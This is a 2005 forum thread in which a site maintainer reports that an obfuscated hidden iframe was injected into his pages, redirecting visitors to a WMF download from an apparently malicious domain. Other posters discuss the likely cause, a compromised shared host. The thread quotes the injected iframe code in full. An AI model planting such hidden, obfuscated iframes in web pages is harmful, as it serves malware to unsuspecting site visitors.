Is my website being hacked?

Discussion in 'Web Design & Coding' started by jimi_81, Dec 28, 2005.

  1. jimi_81

    jimi_81 Moderator Political User

    Messages:
    820
    Location:
    Stoney Creek, ON, Canada
    Ok, i went to check on a site I maintain, and the page did not display, instead i was routed to download a wmf file.

    the two files that the page uses to launch.. index.html, and home.php had the following lines of code at the top of each file:

    Code:
    <iframe src= http://%77%77%77%2E%74%72%75%73%74%34%66%72%65%65%2E%77%73?id=index12 frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe>
    I didnt check the file last modified date... i just made the correction without thinking.

    has anyone ever heard of this happening?
    what happened!
     
  2. SPeedY_B

    SPeedY_B I may actually be insane.

    Messages:
    15,800
    Location:
    Midlands, England
    Where is the site hosted ? If it's a free host, it may be explainable.
     
  3. melon

    melon MS-DOS 2.0 Political User

    Messages:
    854
    Location:
    Ásgarðr
    I had the same thing happen to me. It's clearly a hack of some sort, since I'm on a paid host. I checked the "last modified" date and then my access logs, which revealed nothing out of the ordinary. I have a feeling that, since I'm on a shared host, someone else on the server was running vulnerable software (or maybe even the server itself) and just searched for every "public_html/index.html" (and probably other files like "home.php" there) it could find on the server.

    Unfortunately, I wish I had some answers as to its origin. I haven't been able to find any information myself.

    Melon
     
  4. jimi_81

    jimi_81 Moderator Political User

    Messages:
    820
    Location:
    Stoney Creek, ON, Canada
    some things i have been looking at in the logs...
    under browser lists, i see something called Curl. Never heard of it.

    I googled Curl... what does this mean:
    According to the stats page, only 1 user has curl, 1 hit registered. looks odd, thats why i bring it up.

    the site is hosted on ipowerweb.com.. ive reported it to them.
    The url the iframe points to is a shady looking site: trust4free.ws
     
  5. melon

    melon MS-DOS 2.0 Political User

    Messages:
    854
    Location:
    Ásgarðr
    jimi_81 likes this.
  6. jimi_81

    jimi_81 Moderator Political User

    Messages:
    820
    Location:
    Stoney Creek, ON, Canada
    i feel sick to my stomach.
    ipowerweb seems to be the problem.

    i wont be renewing with them thats for sure.
    what a piss off.

    thanks guys, reps
     
  7. SPeedY_B

    SPeedY_B I may actually be insane.

    Messages:
    15,800
    Location:
    Midlands, England
    It could just be a vulnerable install of some web based software (awstats, phpBB, etc.) on the same server as your site.

    Happened to me, site was blatantly de-faced though so it was spotted straight away.
     
  8. X-Istence

    X-Istence * Political User

    Messages:
    6,498
    Location:
    USA
    curl is a pretty standard utility to transfer files, I use it all the time, it is also implemented in quite a few web search robots, it can off course also be used for bad.

    http://curl.haxx.se